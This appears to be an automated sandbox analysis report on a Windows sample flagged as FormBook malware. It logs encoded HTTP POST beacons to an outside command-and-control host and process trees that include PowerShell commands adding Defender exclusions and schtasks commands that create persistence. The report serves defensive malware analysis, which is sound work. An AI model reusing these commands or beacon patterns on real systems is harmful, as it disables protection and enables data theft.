                                              Data Raw: 67 4e 6c 3d 50 2b 2b 6f 45 50 66 46 72 73 70 2b 2f 64 6d 43 43 57 43 7a 49 69 76 70 71 76 5a 64 6f 65 48 79 61 77 7a 79 38 2b 50 65 65 73 66 72 79 7a 42 49 4e 36 51 75 4d 50 4e 66 4f 51 76 44 5a 57 2b 62 44 32 63 59 6a 50 6a 42 4d 79 78 76 35 51 57 41 69 45 6f 32 47 69 39 76 36 43 76 42 4b 6a 76 34 41 52 58 41 4b 56 41 51 72 52 34 42 75 65 42 64 6e 6d 64 4a 47 74 4f 44 31 56 4e 5a 71 57 30 59 61 33 7a 6a 50 61 48 66 4e 65 5a 37 7a 56 4a 2b 46 50 6a 41 71 78 6c 55 68 58 76 37 79 57 6f 57 48 4d 4c 47 70 4e 6d 33 67 53 43 55 69 44 49 76 2f 69 44 66 65 37 63 72 32 73 74 72 32 41 4f 6d 6b 51 3d 3d
                                              Data Ascii: gNl=P++oEPfFrsp+/dmCCWCzIivpqvZdoeHyawzy8+PeesfryzBIN6QuMPNfOQvDZW+bD2cYjPjBMyxv5QWAiEo2Gi9v6CvBKjv4ARXAKVAQrR4BueBdnmdJGtOD1VNZqW0Ya3zjPaHfNeZ7zVJ+FPjAqxlUhXv7yWoWHMLGpNm3gSCUiDIv/iDfe7cr2str2AOmkQ==
                                              Jul 8, 2024 09:36:51.617281914 CEST646INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:36:51 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-backend: web2
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_ace6c878ffe446dba7a57a3ca9ee6246
                                              Content-Encoding: gzip
                                              Data Raw: 31 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 52 b1 4e c3 30 10 dd fb 15 47 16 16 c8 b5 08 24 84 d2 2c c0 c0 02 1d 90 10 e3 d5 b9 d4 56 1d 3b b2 2f 0d f9 7b ec a4 5d 90 f0 62 dd f9 de bb f7 9e 5c 5d bd 7c 3c 7f 7e ef 5e 41 4b 67 eb 55 75 b9 98 9a 54 89 11 cb f5 bb 87 9e 0e 0c ad 1f 5c 53 e1 d2 5c 55 d6 b8 23 04 b6 db 22 ca 64 39 6a 66 29 40 a6 9e b7 85 f0 8f a0 8a b1 00 1d b8 dd 16 5a a4 8f 4f 88 e3 38 96 2d 45 e9 c8 d8 21 72 50 de 09 3b 29 95 ef b0 35 89 44 7c 48 ab 32 14 d3 8c 2b 67 0e 4c 52 50 2f 92 f6 be 99 52 49 e0 a8 4b 8b 3e 7d 5f d4 15 52 96 be f9 ab 34 75 56 55 5f 7f 31 28 3f d8 c6 5d 0b b4 c6 35 40 17 3f 01 44 33 cc 46 26 3f c0 c9 44 23 dc 94 b0 b3 4c 31 a1 34 ab 63 1a 21 81 fc ac e9 c4 33 40 f9 10 58 c9 02 a4 44 28 61 02 3a 64 bd 15 f6 f3 ce b7 76 86 50 58 10 7e 74 1c c0 b7 09 6e 22 34 3e 7b bb 99 27 14 39 88 2c 43 7f 51 a5 39 61 f6 13 24 8b ff 67 57 6a b6 3d 6a 85 ec 6e 87 88 14 c4 a8 94 1e 6e 1e d6 f9 dc 3d ae 37 f7 9b a2 56 81 49 8c 3b 9c b9 71 e4 7d 76 08 c6 e5 dd 01 48 a5 60 9c e4 [TRUNCATED]
                                              Data Ascii: 15fuRN0G$,V;/{]b\]|<~^AKgUuT\S\U#"d9jf)@ZO8-E!rP;)5D|H2+gLRP/RIK>}_R4uVU_1(?]5@?D3F&?D#L14c!3@XD(a:dvPX~tn"4>{'9,CQ9a$gWj=jnn=7VI;q}vH`/.3p 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.2.449784103.168.172.37805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:36:53.684487104 CEST736OUTPOST /blhi/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.jleabres.com
                                              Origin: http://www.jleabres.com
                                              Referer: http://www.jleabres.com/blhi/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 50 2b 2b 6f 45 50 66 46 72 73 70 2b 77 64 57 43 41 30 71 7a 41 69 76 32 33 66 5a 64 6a 2b 48 32 61 77 2f 79 38 36 2f 4f 64 65 37 72 7a 52 5a 49 4d 2f 6b 75 42 76 4e 66 46 77 76 38 47 47 2f 56 44 32 51 2b 6a 4e 33 42 4d 79 6c 76 35 52 6d 41 69 7a 30 70 47 79 39 74 79 69 76 50 45 44 76 34 41 52 58 41 4b 56 55 36 72 52 67 42 76 74 70 64 6d 48 64 4f 4c 4e 4f 45 68 46 4e 5a 75 57 30 55 61 33 79 30 50 62 4b 36 4e 63 68 37 7a 52 4e 2b 46 2b 6a 42 78 42 6c 53 2b 6e 75 36 37 7a 31 35 48 75 66 49 75 76 69 6c 6c 6a 72 32 75 6c 5a 31 75 54 69 49 4d 37 34 59 72 72 6b 66 37 44 7a 76 2f 63 47 63 4c 44 55 7a 6f 4a 58 2f 34 6d 61 76 77 35 33 32 57 61 4d 3d
                                              Data Ascii: gNl=P++oEPfFrsp+wdWCA0qzAiv23fZdj+H2aw/y86/Ode7rzRZIM/kuBvNfFwv8GG/VD2Q+jN3BMylv5RmAiz0pGy9tyivPEDv4ARXAKVU6rRgBvtpdmHdOLNOEhFNZuW0Ua3y0PbK6Nch7zRN+F+jBxBlS+nu67z15HufIuvilljr2ulZ1uTiIM74Yrrkf7Dzv/cGcLDUzoJX/4mavw532WaM=
                                              Jul 8, 2024 09:36:54.177138090 CEST646INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:36:54 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-backend: web2
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_a6efb1f31221a247a14ca3c0e8b38e20
                                              Content-Encoding: gzip
                                              Data Raw: 31 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 52 b1 4e c3 30 10 dd fb 15 47 16 16 c8 b5 08 24 84 d2 2c c0 c0 02 1d 90 10 e3 d5 b9 d4 56 1d 3b b2 2f 0d f9 7b ec a4 5d 90 f0 62 dd f9 de bb f7 9e 5c 5d bd 7c 3c 7f 7e ef 5e 41 4b 67 eb 55 75 b9 98 9a 54 89 11 cb f5 bb 87 9e 0e 0c ad 1f 5c 53 e1 d2 5c 55 d6 b8 23 04 b6 db 22 ca 64 39 6a 66 29 40 a6 9e b7 85 f0 8f a0 8a b1 00 1d b8 dd 16 5a a4 8f 4f 88 e3 38 96 2d 45 e9 c8 d8 21 72 50 de 09 3b 29 95 ef b0 35 89 44 7c 48 ab 32 14 d3 8c 2b 67 0e 4c 52 50 2f 92 f6 be 99 52 49 e0 a8 4b 8b 3e 7d 5f d4 15 52 96 be f9 ab 34 75 56 55 5f 7f 31 28 3f d8 c6 5d 0b b4 c6 35 40 17 3f 01 44 33 cc 46 26 3f c0 c9 44 23 dc 94 b0 b3 4c 31 a1 34 ab 63 1a 21 81 fc ac e9 c4 33 40 f9 10 58 c9 02 a4 44 28 61 02 3a 64 bd 15 f6 f3 ce b7 76 86 50 58 10 7e 74 1c c0 b7 09 6e 22 34 3e 7b bb 99 27 14 39 88 2c 43 7f 51 a5 39 61 f6 13 24 8b ff 67 57 6a b6 3d 6a 85 ec 6e 87 88 14 c4 a8 94 1e 6e 1e d6 f9 dc 3d ae 37 f7 9b a2 56 81 49 8c 3b 9c b9 71 e4 7d 76 08 c6 e5 dd 01 48 a5 60 9c e4 [TRUNCATED]
                                              Data Ascii: 15fuRN0G$,V;/{]b\]|<~^AKgUuT\S\U#"d9jf)@ZO8-E!rP;)5D|H2+gLRP/RIK>}_R4uVU_1(?]5@?D3F&?D#L14c!3@XD(a:dvPX~tn"4>{'9,CQ9a$gWj=jnn=7VI;q}vH`/.3p 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.449785103.168.172.37805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:36:56.214624882 CEST10818OUTPOST /blhi/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.jleabres.com
                                              Origin: http://www.jleabres.com
                                              Referer: http://www.jleabres.com/blhi/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 50 2b 2b 6f 45 50 66 46 72 73 70 2b 77 64 57 43 41 30 71 7a 41 69 76 32 33 66 5a 64 6a 2b 48 32 61 77 2f 79 38 36 2f 4f 64 65 7a 72 7a 67 35 49 4f 63 38 75 41 76 4e 66 49 51 76 48 47 47 2f 59 44 32 34 69 6a 4e 36 2b 4d 77 64 76 32 54 65 41 6b 43 30 70 49 79 39 74 74 79 76 43 4b 6a 76 49 41 52 48 45 4b 56 45 36 72 52 67 42 76 6f 74 64 32 6d 64 4f 4e 4e 4f 44 31 56 4e 64 71 57 30 77 61 7a 6d 6b 50 62 4f 41 4f 73 42 37 7a 78 64 2b 57 63 62 42 39 42 6c 51 2f 6e 76 70 37 7a 78 6d 48 75 43 33 75 75 47 4c 6c 67 33 32 74 7a 6b 68 32 77 79 51 61 62 68 4b 70 49 49 65 6a 67 4c 4a 78 65 69 54 45 42 49 76 71 71 4c 4c 36 30 69 67 7a 5a 69 73 44 2b 7a 54 54 56 72 49 7a 4c 74 50 54 74 39 50 47 39 68 37 48 76 77 4b 2b 70 61 39 6f 2f 72 54 6e 51 6f 6f 49 55 55 64 64 46 4f 4f 4f 59 74 78 52 35 44 50 4a 36 65 4b 6e 49 55 53 55 69 75 6d 52 5a 72 58 79 5a 6f 79 69 6f 39 59 4b 30 7a 55 58 2b 74 78 71 4b 56 45 39 68 35 44 77 4f 6e 6b 49 45 6a 39 58 37 66 57 62 4a 30 75 33 63 37 64 50 51 48 62 53 57 35 45 34 51 [TRUNCATED]
                                              Data Ascii: gNl=P++oEPfFrsp+wdWCA0qzAiv23fZdj+H2aw/y86/Odezrzg5IOc8uAvNfIQvHGG/YD24ijN6+Mwdv2TeAkC0pIy9ttyvCKjvIARHEKVE6rRgBvotd2mdONNOD1VNdqW0wazmkPbOAOsB7zxd+WcbB9BlQ/nvp7zxmHuC3uuGLlg32tzkh2wyQabhKpIIejgLJxeiTEBIvqqLL60igzZisD+zTTVrIzLtPTt9PG9h7HvwK+pa9o/rTnQooIUUddFOOOYtxR5DPJ6eKnIUSUiumRZrXyZoyio9YK0zUX+txqKVE9h5DwOnkIEj9X7fWbJ0u3c7dPQHbSW5E4QsZvYB4PtBU5/4iOkjeUnAmI2AB3WuyV4DM8yJycRnOvfkbzDAoX+qc6LjW76ApGYT4/+bFbLYB5FQV2Xm20HCl9IIROLmMbMyFjxwMZAe+y8JYEK5C5wUhHKyl5LARN+bwScL6ouW+BKPDpgj+A5Axp+YFcp2KGxpij70ktb14hRbR0yjzMSHn/+sNEbOxRndeNPJK+gn/J/kjQ4Vh0XKBXCC8biTM3RXarMuwkR4Hrl0IwItjUYF3QPy8qT/eoCK1sEne47ZiPAiyfowkQpS3qlS9CNnj62jHU90e0U5Lugsg4dCoALbymx4Ivmqj/hLJiCve0b+1Y8roynIk/ufL0p0yMMCklEEeUCk73aKCoJBVmZneILvFp/D7dQT+ru/BEM/wOh7wTJYiA2H3AbDDSwf373Ejdo0cHuwgg5H6FT1a5BmpK8GBP0Ox64zVMvIzy6PWCdx5i0589KIfIUutAN4UmhEPFCj6Jr8pXqtMbwq3TQ69eE0QlmF5mGGArL8R8fRcyCasrA4VPbbJVEsFGw4QlZL80yZBPtuvB8rntRcX566x7em7jCmajAFAglAL3w4jUcGa8GfVuC5i6UMdzL9Mn46Au6zCfeny/xwIlVGR1eh4NImwPj+fCZfw9vODQXNl7fvmxxs7UltI8l9/zVo05+oA1e02 [TRUNCATED]
                                              Jul 8, 2024 09:36:56.709939003 CEST646INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:36:56 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-backend: web2
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_f36ea58d1e3d6efb07d1ea9618fb2aa1
                                              Content-Encoding: gzip
                                              Data Raw: 31 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 52 b1 4e c3 30 10 dd fb 15 47 16 16 c8 b5 08 24 84 d2 2c c0 c0 02 1d 90 10 e3 d5 b9 d4 56 1d 3b b2 2f 0d f9 7b ec a4 5d 90 f0 62 dd f9 de bb f7 9e 5c 5d bd 7c 3c 7f 7e ef 5e 41 4b 67 eb 55 75 b9 98 9a 54 89 11 cb f5 bb 87 9e 0e 0c ad 1f 5c 53 e1 d2 5c 55 d6 b8 23 04 b6 db 22 ca 64 39 6a 66 29 40 a6 9e b7 85 f0 8f a0 8a b1 00 1d b8 dd 16 5a a4 8f 4f 88 e3 38 96 2d 45 e9 c8 d8 21 72 50 de 09 3b 29 95 ef b0 35 89 44 7c 48 ab 32 14 d3 8c 2b 67 0e 4c 52 50 2f 92 f6 be 99 52 49 e0 a8 4b 8b 3e 7d 5f d4 15 52 96 be f9 ab 34 75 56 55 5f 7f 31 28 3f d8 c6 5d 0b b4 c6 35 40 17 3f 01 44 33 cc 46 26 3f c0 c9 44 23 dc 94 b0 b3 4c 31 a1 34 ab 63 1a 21 81 fc ac e9 c4 33 40 f9 10 58 c9 02 a4 44 28 61 02 3a 64 bd 15 f6 f3 ce b7 76 86 50 58 10 7e 74 1c c0 b7 09 6e 22 34 3e 7b bb 99 27 14 39 88 2c 43 7f 51 a5 39 61 f6 13 24 8b ff 67 57 6a b6 3d 6a 85 ec 6e 87 88 14 c4 a8 94 1e 6e 1e d6 f9 dc 3d ae 37 f7 9b a2 56 81 49 8c 3b 9c b9 71 e4 7d 76 08 c6 e5 dd 01 48 a5 60 9c e4 [TRUNCATED]
                                              Data Ascii: 15fuRN0G$,V;/{]b\]|<~^AKgUuT\S\U#"d9jf)@ZO8-E!rP;)5D|H2+gLRP/RIK>}_R4uVU_1(?]5@?D3F&?D#L14c!3@XD(a:dvPX~tn"4>{'9,CQ9a$gWj=jnn=7VI;q}vH`/.3p 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.449786103.168.172.37805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:36:58.748591900 CEST451OUTGET /blhi/?gNl=C8WIH5va3s5TreqFc2nELhDO18EwidTtZxXY9LPFT+Lx3xlqM8I5Ju57JxDvAC7mNl8Ctob5Agt863C6qDgbGQkS7yjDKhT2SlbiFn0xwTwlv8oMq0J/ecs=&QdC=AFMh5N HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.jleabres.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:36:59.205349922 CEST796INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:36:59 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 544
                                              Connection: close
                                              x-backend: web2
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_13f27a3d4ba3fee707956bee565fe02d
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:03:32:55
                                              Start date:08/07/2024
                                              Path:C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
                                              Imagebase:0x1f0000
                                              File size:744'448 bytes
                                              MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:03:32:57
                                              Start date:08/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
                                              Imagebase:0x650000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:03:32:57
                                              Start date:08/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:03:32:58
                                              Start date:08/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
                                              Imagebase:0x650000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:03:32:58
                                              Start date:08/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:03:32:58
                                              Start date:08/07/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp"
                                              Imagebase:0xe60000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:03:32:58
                                              Start date:08/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:03:32:58
                                              Start date:08/07/2024
                                              Path:C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
                                              Imagebase:0xc30000
                                              File size:744'448 bytes
                                              MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:03:32:59
                                              Start date:08/07/2024
                                              Path:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              Imagebase:0x410000
                                              File size:744'448 bytes
                                              MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 34%, ReversingLabs
                                              • Detection: 32%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:03:33:01
                                              Start date:08/07/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff693ab0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:03:33:04
                                              Start date:08/07/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp"
                                              Imagebase:0xe60000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:03:33:04
                                              Start date:08/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:03:33:04
                                              Start date:08/07/2024
                                              Path:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
                                              Imagebase:0x260000
                                              File size:744'448 bytes
                                              MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:03:33:04
                                              Start date:08/07/2024
                                              Path:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
                                              Imagebase:0x230000
                                              File size:744'448 bytes
                                              MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:03:33:04
                                              Start date:08/07/2024
                                              Path:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
                                              Imagebase:0x630000
                                              File size:744'448 bytes
                                              MD5 hash:5CB7ACEF6FCB2F9FEED94483F364030A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:03:33:07
                                              Start date:08/07/2024
                                              Path:C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe"
                                              Imagebase:0xef0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
